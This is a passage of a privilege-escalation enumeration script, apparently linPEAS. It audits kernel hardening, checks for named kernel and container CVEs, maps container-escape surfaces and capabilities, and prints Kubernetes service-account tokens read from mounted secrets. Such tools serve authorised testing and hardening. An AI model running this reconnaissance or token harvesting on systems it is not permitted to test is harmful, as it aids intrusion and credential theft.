| sed "s,disabled,${SED_RED}," 4452 #-- SY) Seccomp 4453 print_list "Seccomp enabled? ............... "$NC 4454 ([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," 4455 #-- SY) AppArmor 4456 print_list "User namespace? ................ "$NC 4457 if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi 4458 #-- SY) Unprivileged user namespaces 4459 print_sysctl_eq_zero "unpriv_userns_clone? ........... " "/proc/sys/kernel/unprivileged_userns_clone" "unpriv_userns_clone" "$SED_GREEN" "$SED_RED" 4460 #-- SY) Unprivileged eBPF 4461 print_sysctl_eq_zero "unpriv_bpf_disabled? ........... " "/proc/sys/kernel/unprivileged_bpf_disabled" "unpriv_bpf_disabled" "$SED_RED" "$SED_GREEN" 4462 #-- SY) cgroup2 4463 print_list "Cgroup2 enabled? ............... "$NC 4464 ([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," 4465 #-- SY) Kernel hardening sysctls 4466 print_sysctl_eq_zero "kptr_restrict? ................. " "/proc/sys/kernel/kptr_restrict" "kptr_restrict" "$SED_RED" "$SED_GREEN" 4467 print_sysctl_eq_zero "dmesg_restrict? ................ " "/proc/sys/kernel/dmesg_restrict" "dmesg_restrict" "$SED_RED" "$SED_GREEN" 4468 print_sysctl_eq_zero "ptrace_scope? .................. " "/proc/sys/kernel/yama/ptrace_scope" "ptrace_scope" "$SED_RED" "$SED_GREEN" 4469 print_sysctl_eq_zero "protected_symlinks? ............ " "/proc/sys/fs/protected_symlinks" "protected_symlinks" "$SED_RED" "$SED_GREEN" 4470 print_sysctl_eq_zero "protected_hardlinks? ........... " "/proc/sys/fs/protected_hardlinks" "protected_hardlinks" "$SED_RED" "$SED_GREEN" 4471 print_list "perf_event_paranoid? ........... "$NC 4472 perf_event_paranoid=$(cat /proc/sys/kernel/perf_event_paranoid 2>/dev/null) 4473 if [ -z "$perf_event_paranoid" ]; then 4474 echo_not_found "/proc/sys/kernel/perf_event_paranoid" 4475 else 4476 if [ "$perf_event_paranoid" -le 1 ]; then echo "$perf_event_paranoid" | sed -${E} "s,.*,${SED_RED},g"; else echo "$perf_event_paranoid" | sed -${E} "s,.*,${SED_GREEN},g"; fi 4477 fi 4478 print_sysctl_eq_zero "mmap_min_addr? ................. " "/proc/sys/vm/mmap_min_addr" "mmap_min_addr" "$SED_RED" "$SED_GREEN" 4479 print_list "lockdown mode? ................. "$NC 4480 if [ -f "/sys/kernel/security/lockdown" ]; then 4481 cat /sys/kernel/security/lockdown 2>/dev/null | sed -${E} "s,none,${SED_RED},g; s,integrity|confidentiality,${SED_GREEN},g" 4482 else 4483 echo_not_found "/sys/kernel/security/lockdown" 4484 fi 4485 #-- SY) Kernel hardening config flags 4486 print_list "Kernel hardening flags? ........ "$NC 4487 if [ -f "/boot/config-$(uname -r)" ]; then 4488 grep -E 'CONFIG_RANDOMIZE_BASE|CONFIG_STACKPROTECTOR|CONFIG_SLAB_FREELIST_|CONFIG_KASAN' /boot/config-$(uname -r) 2>/dev/null 4489 elif [ -f "/proc/config.gz" ]; then 4490 zcat /proc/config.gz 2>/dev/null | grep -E 'CONFIG_RANDOMIZE_BASE|CONFIG_STACKPROTECTOR|CONFIG_SLAB_FREELIST_|CONFIG_KASAN' 4491 else 4492 echo_not_found "kernel config" 4493 fi 4494 #-- SY) Fail2ban (Intrusion Prevention System) 4495 print_list "Fail2ban present? .............. "$NC 4496 if command -v fail2ban-client >/dev/null 2>&1 || [ -S "/var/run/fail2ban/fail2ban.sock" ] || pgrep -x fail2ban-server >/dev/null 2>&1; then 4497 f2b_jails=$(fail2ban-client status 2>/dev/null | grep "Jail list" | sed "s/.*Jail list:[[:space:]]*//") 4498 if [ "$f2b_jails" ]; then 4499 echo "Yes - active, jails: $f2b_jails" | sed -${E} "s,.*,${SED_GREEN}," 4500 else 4501 echo "Yes - installed (could not query jails, may need root)" | sed -${E} "s,.*,${SED_GREEN}," 4502 fi 4503 else 4504 echo_not_found "fail2ban" 4505 fi 4506 #-- SY) CrowdSec (Intrusion Prevention System) 4507 print_list "CrowdSec present? .............. "$NC 4508 if command -v cscli >/dev/null 2>&1 || pgrep -x crowdsec >/dev/null 2>&1; then 4509 echo "Yes" | sed -${E} "s,.*,${SED_GREEN}," 4510 else 4511 echo_not_found "crowdsec" 4512 fi 4513 #-- SY) Pending reboot (updates installed but not applied yet) 4514 print_list "Pending reboot? ................ "$NC 4515 if [ -f "/var/run/reboot-required" ] || [ -f "/run/reboot-required" ]; then 4516 echo "Yes - updates installed but not applied, the running kernel/libs may be outdated (check kernel exploits)" | sed -${E} "s,.*,${SED_RED}," 4517 if [ -f "/var/run/reboot-required.pkgs" ]; then 4518 sed "s,^, ," "/var/run/reboot-required.pkgs" 2>/dev/null 4519 fi 4520 else 4521 echo_no 4522 fi 4523 #-- SY) Gatekeeper 4524 if [ "$MACPEAS" ]; then 4525 print_list "Gatekeeper enabled? .......... "$NC 4526 (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," 4527 print_list "sleepimage encrypted? ........ "$NC 4528 (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no 4529 print_list "XProtect? .................... "$NC 4530 (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no 4531 print_list "SIP enabled? ................. "$NC 4532 csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no 4533 print_list "Sealed Snapshot? ............. "$NC 4534 diskutil apfs list | grep "Snapshot Sealed" | awk -F: '{print $2}' | tr -d '[:space:]' | sed "s,Yes,${SED_GREEN}," | sed "s,No,${SED_RED}," || echo_not_found 4535 print_list "Sealed Snapshot (2nd)? ....... "$NC 4536 csrutil authenticated-root status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no 4537 print_list "Connected to JAMF? ........... "$NC 4538 warn_exec jamf checkJSSConnection 4539 print_list "Connected to AD? ............. "$NC 4540 dsconfigad -show && echo "" || echo_no 4541 fi 4542 #-- SY) ASLR 4543 print_list "Is ASLR enabled? ............... "$NC 4544 ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) 4545 if [ -z "$ASLR" ]; then 4546 echo_not_found "/proc/sys/kernel/randomize_va_space"; 4547 else 4548 if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi 4549 echo "" 4550 fi 4551 #-- SY) Printer 4552 print_list "Printer? ....................... "$NC 4553 (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null 4554 #-- SY) Running in a virtual environment 4555 print_list "Is this a virtual machine? ..... "$NC 4556 hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) 4557 if [ "$(command -v systemd-detect-virt 2>/dev/null || echo -n '')" ]; then 4558 detectedvirt=$(systemd-detect-virt) 4559 if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi 4560 else 4561 if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi 4562 fi 4563 echo "" 4564 4565 fi 4566 4567 if check_mitre_filter "T1547.006,T1068"; then 4568 echo "" 4569 print_2title "Kernel Modules Information" "T1547.006" 4570 checkCIFSwitchCVE202646243 4571 # List loaded kernel modules 4572 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then 4573 print_3title "Loaded kernel modules" "T1547.006" 4574 if [ -f "/proc/modules" ]; then 4575 if command -v lsmod >/dev/null 2>&1; then 4576 lsmod 4577 else 4578 cat /proc/modules 4579 fi 4580 else 4581 echo_not_found "/proc/modules" 4582 fi 4583 fi 4584 # Check for kernel modules with weak permissions 4585 print_3title "Kernel modules with weak perms?" "T1547.006" 4586 if [ -d "/lib/modules" ]; then 4587 find /lib/modules -type f -name "*.ko" -ls 2>/dev/null | grep -Ev "root\s+root" | sed -${E} "s,.*,${SED_RED},g" 4588 if [ $? -eq 1 ]; then 4589 echo "No kernel modules with weak permissions found" 4590 fi 4591 else 4592 echo_not_found "/lib/modules" 4593 fi 4594 echo "" 4595 # Check for kernel modules that can be loaded by unprivileged users 4596 print_3title "Kernel modules loadable? " "T1547.006" 4597 if [ -f "/proc/sys/kernel/modules_disabled" ]; then 4598 if [ "$(cat /proc/sys/kernel/modules_disabled)" = "0" ]; then 4599 echo "Modules can be loaded" | sed -${E} "s,.*,${SED_RED},g" 4600 else 4601 echo "Modules cannot be loaded" | sed -${E} "s,.*,${SED_GREEN},g" 4602 fi 4603 else 4604 echo_not_found "/proc/sys/kernel/modules_disabled" 4605 fi 4606 # Check for module signature enforcement 4607 print_3title "Module signature enforcement? " "T1547.006" 4608 if [ -f "/proc/sys/kernel/module_sig_enforce" ]; then 4609 if [ "$(cat /proc/sys/kernel/module_sig_enforce)" = "1" ]; then 4610 echo "Enforced" | sed -${E} "s,.*,${SED_GREEN},g" 4611 else 4612 echo "Not enforced" | sed -${E} "s,.*,${SED_RED},g" 4613 fi 4614 elif [ -f "/sys/module/module/parameters/sig_enforce" ]; then 4615 if [ "$(cat /sys/module/module/parameters/sig_enforce)" = "Y" ]; then 4616 echo "Enforced" | sed -${E} "s,.*,${SED_GREEN},g" 4617 else 4618 echo "Not enforced" | sed -${E} "s,.*,${SED_RED},g" 4619 fi 4620 else 4621 echo_not_found "module_sig_enforce" 4622 fi 4623 echo "" 4624 4625 fi 4626 4627 if check_mitre_filter "T1068"; then 4628 print_2title "Checking for Copy Fail (CVE-2026-31431)" "T1068" 4629 print_info "https://copy.fail/" 4630 print_info "https://www.cve.org/CVERecord?id=CVE-2026-31431" 4631 checkCopyFail 4632 echo "" 4633 4634 fi 4635 4636 if check_mitre_filter "T1068"; then 4637 print_2title "Kernel Exploit Registry" "T1068" 4638 kercve_run_registry 4639 echo "" 4640 4641 fi 4642 4643 if check_mitre_filter "T1068"; then 4644 print_2title "Checking for Dirty Frag (CVE-2026-43284 / CVE-2026-43500)" "T1068" 4645 print_info "https://ubuntu.com/blog/dirty-frag-linux-vulnerability-fixes-available" 4646 print_info "https://www.cve.org/CVERecord?id=CVE-2026-43284" 4647 print_info "https://www.cve.org/CVERecord?id=CVE-2026-43500" 4648 checkDirtyFrag 4649 echo "" 4650 4651 fi 4652 4653 if check_mitre_filter "T1082"; then 4654 if [ "$ONLINE_VULN_CHECKS" ] && [ -z "$NOT_CHECK_EXTERNAL_HOSTNAME" ]; then 4655 print_2title "Package Vulnerabilities" "T1082" 4656 print_info "This uses the optional HackTricks online lookup enabled with -V or -a. Output is capped at 50 vulnerable packages." 4657 linpeas_print_package_vulnerabilities 4658 echo "" 4659 fi 4660 4661 fi 4662 4663 fi 4664 4665 fi 4666 echo '' 4667 echo '' 4668 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 4669 4670 if echo $CHECKS | grep -q container; then 4671 if check_mitre_filter "T1613,T1528,T1552.007,T1611"; then 4672 print_title "Container" 4673 if check_mitre_filter "T1613"; then 4674 print_2title "Container related tools present (if any):" "T1613" 4675 # Container runtimes 4676 command -v docker 4677 command -v lxc 4678 command -v rkt 4679 command -v podman 4680 command -v runc 4681 command -v ctr 4682 command -v containerd 4683 command -v crio 4684 command -v nerdctl 4685 # Container management 4686 command -v kubectl 4687 command -v crictl 4688 command -v docker-compose 4689 command -v docker-machine 4690 command -v minikube 4691 command -v kind 4692 # Container networking 4693 command -v docker-proxy 4694 command -v cni 4695 command -v flanneld 4696 command -v calicoctl 4697 # Container security 4698 command -v apparmor_parser 4699 command -v seccomp 4700 command -v gvisor 4701 command -v kata-runtime 4702 # Container debugging 4703 command -v nsenter 4704 command -v unshare 4705 command -v chroot 4706 command -v capsh 4707 command -v setcap 4708 command -v getcap 4709 echo "" 4710 4711 fi 4712 4713 if check_mitre_filter "T1528,T1552.007"; then 4714 if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then 4715 print_2title "Listing mounted tokens" "T1528,T1552.007" 4716 print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html" 4717 ALREADY_TOKENS="IinItialVaaluE" 4718 for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do 4719 TEMP_TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/')) 4720 if ! [ $(echo $TEMP_TOKEN | grep -E $ALREADY_TOKENS) ]; then 4721 ALREADY_TOKENS="$ALREADY_TOKENS|$TEMP_TOKEN" 4722 echo "Directory: $i" 4723 echo "Namespace: $(cat $i)" 4724 echo "" 4725 echo $TEMP_TOKEN 4726 echo "================================================================================" 4727 echo "" 4728 fi 4729 done 4730 fi 4731 4732 fi 4733 4734 containerCheck 4735 if check_mitre_filter "T1613,T1611"; then 4736 print_2title "Container details" "T1613,T1611" 4737 print_list "Is this a container? ...........$NC $containerType" 4738 has_runtime_cli() { 4739 command -v "$1" >/dev/null 2>&1 4740 } 4741 print_runtime_info() { 4742 if has_runtime_cli "$1"; then 4743 print_list "$2$NC " 4744 shift 2 4745 warn_exec "$@" 4746 fi 4747 } 4748 get_runtime_container_count() { 4749 if has_runtime_cli "$1"; then 4750 shift 4751 "$@" 2>/dev/null | wc -l | tr -d ' ' 4752 else 4753 echo "0" 4754 fi 4755 } 4756 print_running_containers() { 4757 if [ "$1" -ne "0" ]; then 4758 echo "$2" | sed -${E} "s,.*,${SED_RED}," 4759 shift 4760 shift 4761 "$@" 2>/dev/null 4762 echo "" 4763 fi 4764 } 4765 if [ -e "/proc/vz" ] && ! [ -e "/proc/bc" ]; then 4766 print_list "Container Runtime ..............$NC OpenVZ" 4767 fi 4768 if [ -f "/run/systemd/container" ]; then 4769 print_list "Systemd Container ..............$NC $(cat /run/systemd/container)" 4770 fi 4771 if [ -f "/run/.containerenv" ]; then 4772 print_list "Podman/OCI marker ..............$NC /run/.containerenv" 4773 fi 4774 if [ -f "/.dockerenv" ]; then 4775 print_list "Docker marker ..................$NC /.dockerenv" 4776 fi 4777 # Get container runtime info 4778 print_runtime_info docker "Docker version ..............." docker version 4779 print_runtime_info docker "Docker info ................." docker info 4780 print_runtime_info podman "Podman version .............." podman version 4781 print_runtime_info podman "Podman info ................" podman info 4782 print_runtime_info lxc "LXC version ................" lxc version 4783 print_runtime_info lxc "LXC info ..................." lxc info 4784 print_runtime_info crio "CRI-O version ..............." crio --version 4785 print_runtime_info runc "runc version ..............." runc --version 4786 print_runtime_info crun "crun version ..............." crun --version 4787 print_runtime_info nerdctl "nerdctl version ............" nerdctl version 4788 print_runtime_info crictl "crictl version ............." crictl version 4789 print_runtime_info ctr "ctr version ................" ctr version 4790 print_list "Interesting runtime sockets ... "$NC 4791 enumerateDockerSockets 4792 print_list "Any running containers? ........ "$NC 4793 # Get counts of running containers for each platform 4794 dockercontainers=0 4795 podmancontainers=0 4796 lxccontainers=0 4797 rktcontainers=0 4798 nerdctlcontainers=0 4799 crictlcontainers=0 4800 ctrcontainers=0 4801 dockercontainers=$(get_runtime_container_count docker docker ps --format "{{.Names}}") 4802 podmancontainers=$(get_runtime_container_count podman podman ps --format "{{.Names}}") 4803 lxccontainers=$(get_runtime_container_count lxc lxc list -c n --format csv) 4804 rktcontainers=$(get_runtime_container_count rkt sh -c 'rkt list 2>/dev/null | tail -n +2') 4805 nerdctlcontainers=$(get_runtime_container_count nerdctl nerdctl ps --format "{{.Names}}") 4806 crictlcontainers=$(get_runtime_container_count crictl crictl ps -q) 4807 ctrcontainers=$(get_runtime_container_count ctr ctr -n k8s.io containers list -q) 4808 if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ] && [ "$nerdctlcontainers" -eq "0" ] && [ "$crictlcontainers" -eq "0" ] && [ "$ctrcontainers" -eq "0" ]; then 4809 echo_no 4810 else 4811 containerCounts="" 4812 if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi 4813 if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi 4814 if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi 4815 if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi 4816 if [ "$nerdctlcontainers" -ne "0" ]; then containerCounts="${containerCounts}nerdctl($nerdctlcontainers) "; fi 4817 if [ "$crictlcontainers" -ne "0" ]; then containerCounts="${containerCounts}crictl($crictlcontainers) "; fi 4818 if [ "$ctrcontainers" -ne "0" ]; then containerCounts="${containerCounts}ctr($ctrcontainers) "; fi 4819 echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," 4820 # List any running containers with more details 4821 print_running_containers "$dockercontainers" "Running Docker Containers" docker ps -a 4822 print_running_containers "$podmancontainers" "Running Podman Containers" podman ps -a 4823 print_running_containers "$lxccontainers" "Running LXC Containers" lxc list 4824 print_running_containers "$rktcontainers" "Running RKT Containers" rkt list 4825 print_running_containers "$nerdctlcontainers" "Running nerdctl Containers" nerdctl ps -a 4826 print_running_containers "$crictlcontainers" "Running CRI Containers" crictl ps -a 4827 print_running_containers "$ctrcontainers" "Running ctr Containers (k8s.io namespace)" ctr -n k8s.io containers list 4828 fi 4829 echo "" 4830 4831 fi 4832 4833 if check_mitre_filter "T1613"; then 4834 #If docker 4835 if echo "$containerType" | grep -qi "docker"; then 4836 print_2title "Docker Container details" "T1613" 4837 inDockerGroup 4838 print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4839 print_list "Looking and enumerating runtime sockets:\n"$NC 4840 enumerateDockerSockets 4841 print_list "Docker version .................$NC$dockerVersion" 4842 checkDockerVersionExploits 4843 print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4844 print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4845 print_list "Vulnerable to CVE-2021-41091 ...$NC$VULN_CVE_2021_41091"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4846 if [ "$inContainer" ]; then 4847 checkDockerRootless 4848 print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," 4849 print_list "Checking Docker Desktop internal Engine API (CVE-2025-9074):\n"$NC 4850 enumerateDockerDesktopAPI 4851 echo "" 4852 fi 4853 if df -h | grep docker; then 4854 print_2title "Docker Overlays" "T1613" 4855 df -h | grep docker 4856 fi 4857 fi 4858 4859 fi 4860 4861 if check_mitre_filter "T1611"; then 4862 if [ "$inContainer" ]; then 4863 echo "" 4864 print_2title "Container & breakout enumeration" "T1611" 4865 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/index.html" 4866 # Basic container info 4867 print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')" 4868 if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then 4869 print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" 4870 fi 4871 # Hardening and isolation controls 4872 print_3title "Hardening & isolation" "T1611" 4873 seccomp_mode_num="$(awk '/^Seccomp:/{print $2}' /proc/self/status 2>/dev/null)" 4874 seccomp_mode_desc="unknown" 4875 case "$seccomp_mode_num" in 4876 0) seccomp_mode_desc="disabled" ;; 4877 1) seccomp_mode_desc="strict" ;; 4878 2) seccomp_mode_desc="filtering" ;; 4879 esac 4880 print_list "Seccomp mode ................... "$NC 4881 (printf "%s (%s)\n" "$seccomp_mode_desc" "${seccomp_mode_num:-?}") | sed "s,disabled,${SED_RED}," | sed "s,strict,${SED_RED_YELLOW}," | sed "s,filtering,${SED_GREEN}," 4882 if grep -q "^Seccomp_filters:" /proc/self/status 2>/dev/null; then 4883 print_list "Seccomp filters ............... "$NC 4884 awk '/^Seccomp_filters:/{print $2}' /proc/self/status 2>/dev/null | sed -${E} "s,^[0-9]+$,${SED_GREEN}&," 4885 fi 4886 no_new_privs_num="$(awk '/^NoNewPrivs:/{print $2}' /proc/self/status 2>/dev/null)" 4887 print_list "NoNewPrivs ..................... "$NC 4888 case "$no_new_privs_num" in 4889 1) printf "enabled (1)\n" | sed -${E} "s,enabled,${SED_GREEN}," ;; 4890 0) printf "disabled (0)\n" | sed -${E} "s,disabled,${SED_RED_YELLOW}," ;; 4891 *) printf "unknown\n" ;; 4892 esac 4893 print_list "AppArmor profile ............... "$NC 4894 (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," 4895 selinux_status="disabled" 4896 if command -v getenforce >/dev/null 2>&1; then 4897 selinux_status="$(getenforce 2>/dev/null || echo disabled)" 4898 elif [ -r /sys/fs/selinux/enforce ]; then 4899 if [ "$(cat /sys/fs/selinux/enforce 2>/dev/null)" = "1" ]; then 4900 selinux_status="Enforcing" 4901 else 4902 selinux_status="Permissive" 4903 fi 4904 fi 4905 print_list "SELinux status ................. "$NC 4906 printf "%s\n" "$selinux_status" | sed -${E} "s,Enforcing,${SED_GREEN},g" | sed -${E} "s,Permissive,${SED_RED_YELLOW},g" | sed -${E} "s,disabled,${SED_RED},g" 4907 selinux_context="$(cat /proc/self/attr/current 2>/dev/null | grep -E ':' || true)" 4908 if [ "$selinux_context" ]; then 4909 print_list "SELinux context ................ "$NC 4910 printf "%s\n" "$selinux_context" | sed -${E} "s,container_t|spc_t,${SED_RED_YELLOW}&,g" 4911 fi 4912 uid_map_value="$(cat /proc/self/uid_map 2>/dev/null)" 4913 gid_map_value="$(cat /proc/self/gid_map 2>/dev/null)" 4914 setgroups_value="$(cat /proc/self/setgroups 2>/dev/null)" 4915 print_list "User namespace mappings ....... "$NC 4916 if echo "$uid_map_value" | grep -Eq "^[[:space:]]*0[[:space:]]+0[[:space:]]+4294967295[[:space:]]*$"; then 4917 echo "initial user namespace" | sed -${E} "s,initial user namespace,${SED_RED_YELLOW}," 4918 elif [ "$uid_map_value" ]; then 4919 echo "remapped user namespace" | sed -${E} "s,remapped user namespace,${SED_GREEN}," 4920 else 4921 echo "unknown" 4922 fi 4923 if [ "$uid_map_value" ]; then 4924 echo " UID map (container -> host -> range):" 4925 echo "$uid_map_value" | awk '{print " " $1 " -> " $2 " -> " $3}' 4926 fi 4927 if [ "$gid_map_value" ]; then 4928 echo " GID map (container -> host -> range):" 4929 echo "$gid_map_value" | awk '{print " " $1 " -> " $2 " -> " $3}' 4930 fi 4931 if [ "$setgroups_value" ]; then 4932 echo " setgroups: $setgroups_value" 4933 fi 4934 # Known vulnerabilities 4935 print_3title "Known Vulnerabilities" "T1611" 4936 checkContainerExploits 4937 print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4938 # Check for container escape tools 4939 container_breakout_tools="$( 4940 for tool in nsenter unshare chroot capsh setcap getcap docker kubectl ctr runc containerd crio podman lxc rkt nerdctl; do 4941 command -v "$tool" 2>/dev/null 4942 done 4943 )" 4944 print_list "Container escape tools present . "$NC 4945 if [ "$container_breakout_tools" ]; then 4946 printf "%s\n" "$container_breakout_tools" | sed -${E} "s,.*,${SED_RED}&," 4947 else 4948 echo "No" 4949 fi 4950 # Runtime vulnerabilities 4951 print_3title "Runtime Vulnerabilities" "T1611" 4952 # Check for known runtime vulnerabilities 4953 if [ "$(command -v runc || echo -n '')" ]; then 4954 print_list "Runc version ................. "$NC 4955 warn_exec runc --version 4956 # Check for specific runc vulnerabilities 4957 runc_version=$(runc --version 2>/dev/null | grep -i "version" | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+") 4958 if [ "$runc_version" ]; then 4959 print_list "Runc CVE-2019-5736 ........... "$NC 4960 if [ "$(echo $runc_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 0) || ($1 == 1 && $2 == 0 && $3 < 7)) print "Yes"; else print "No"; }')" = "Yes" ]; then 4961 echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED}," 4962 else 4963 echo "No" 4964 fi 4965 fi 4966 fi 4967 if [ "$(command -v containerd || echo -n '')" ]; then 4968 print_list "Containerd version ........... "$NC 4969 warn_exec containerd --version 4970 # Check for specific containerd vulnerabilities 4971 containerd_version=$(containerd --version 2>/dev/null | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+") 4972 if [ "$containerd_version" ]; then 4973 print_list "Containerd CVE-2020-15257 ..... "$NC 4974 if [ "$(echo $containerd_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 4) || ($1 == 1 && $2 == 4 && $3 < 3)) print "Yes"; else print "No"; }')" = "Yes" ]; then 4975 echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED}," 4976 else 4977 echo "No" 4978 fi 4979 fi 4980 fi 4981 # Mount, procfs and sysfs escape surfaces 4982 print_3title "Mount, procfs & sysfs surfaces" "T1611" 4983 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/sensitive-host-mounts.html" 4984 checkProcSysBreakouts 4985 root_mount_mode="$(awk '$5=="/"{print $6; exit}' /proc/self/mountinfo 2>/dev/null | cut -d',' -f1)" 4986 print_list "/proc heavily populated ........ $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4987 print_list "/dev heavily populated ......... $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4988 print_list "Root filesystem mode ........... ${root_mount_mode:-unknown}\n" | sed -${E} "s,rw,${SED_RED_YELLOW}," | sed -${E} "s,ro,${SED_GREEN}," 4989 print_list "Run unshare .................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED}," 4990 print_list "release_agent surface 1 ........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED}," 4991 print_list "release_agent surface 2 ........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4992 print_list "release_agent surface 3 ........ $release_agent_breakout3\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4993 print_list "Writable core_pattern .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4994 print_list "Writable binfmt_misc/register .. $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4995 print_list "Writable uevent_helper ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," 4996 # Additional mount checks 4997 print_list "Mounted runtime sockets ........ "$NC 4998 (mount | grep -E "docker.sock|containerd.sock|crio.sock|podman.sock|buildkitd.sock|kubelet.sock|firecracker-containerd.sock" || echo "No") | sed -${E} "s,docker.sock|containerd.sock|crio.sock|podman.sock|buildkitd.sock|kubelet.sock|firecracker-containerd.sock,${SED_RED},g" 4999 print_list "Common host filesystem mounted? "$NC 5000 (mount | grep -E "host|/host|/mnt/host|/rootfs" || echo "No") | sed -${E} "s,host|/host|/mnt/host|/rootfs,${SED_RED},g" 5001 print_list "Interesting mounts ............. "$NC 5002 mount | grep -E "docker|container|overlay|kubelet|buildkit|crio|podman|/host|/rootfs" | grep -v "proc" | sed -${E} "s,docker.sock|containerd.sock|crio.sock|podman.sock|kubelet.sock|buildkitd.sock|host|rootfs|privileged,${SED_RED},g" 5003 # Check for writable mount points 5004 print_list "Writable mount points ......... "$NC 5005 mount | grep -E "rw," | grep -v "ro," | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g" 5006 # Check for shared mount points 5007 print_list "Shared mount points ........... "$NC 5008 mount | grep -E "shared|slave" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g" 5009 # Capability checks 5010 print_3title "Capability Checks" "T1611" 5011 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/protections/capabilities.html" 5012 print_list "Dangerous capabilities ......... "$NC 5013 if [ "$(command -v capsh || echo -n '')" ]; then 5014 capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" 5015 else 5016 defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap" 5017 cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g" 5018 echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC 5019 fi 5020 print_list "Ambient capabilities ........... "$NC 5021 (grep "CapAmb:" /proc/self/status 2>/dev/null | grep -v "0000000000000000" | sed "s,CapAmb:.,," || echo "No") | sed -${E} "s,No,${SED_GREEN}," | sed -${E} "s,[0-9a-fA-F]\+,${SED_RED}&," 5022 # Additional capability checks 5023 print_list "ptrace_scope (host) ........... 